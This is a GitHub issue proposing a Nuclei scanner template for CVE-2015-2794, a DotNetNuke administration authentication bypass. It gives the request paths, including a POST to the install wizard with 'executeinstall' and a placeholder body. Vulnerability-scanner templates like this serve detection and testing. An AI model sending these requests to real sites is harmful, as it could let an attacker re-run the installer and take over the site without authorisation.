### ISSUE TITLE
CVE-2015-2794

### ISSUE THREAD

**Issue by Kro0oz** [projectdiscovery/nuclei-templates#8866]
### Template Information:

https://github.com/Kro0oz/-DotNetNuke-Administration-Authentication-Bypass
![33333](https://github.com/projectdiscovery/nuclei-templates/assets/72355033/42c815e0-f347-48bf-a5af-2481143bdb84)
![45555](https://github.com/projectdiscovery/nuclei-templates/assets/72355033/2a5b1630-6180-455d-b450-70d062112c61)

### Nuclei Template:

```yaml
id: CVE-2015-2794
info:
  name: DotNetNuke Administration Authentication Bypass
  author: 1337kro
  severity: Critical
  reference:
    - https://github.com/Kro0oz/-DotNetNuke-Administration-Authentication-Bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE="
    matchers:
      - type: word
        words:
          - "DotNetNuke"
          - "File and Folder Permissions Check"

  - method: POST
    path:
      - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE=&culture=en-US&executeinstall"
    body: "all_info_filled_here"
    matchers:
      - type: status
        status:
          - 200
```
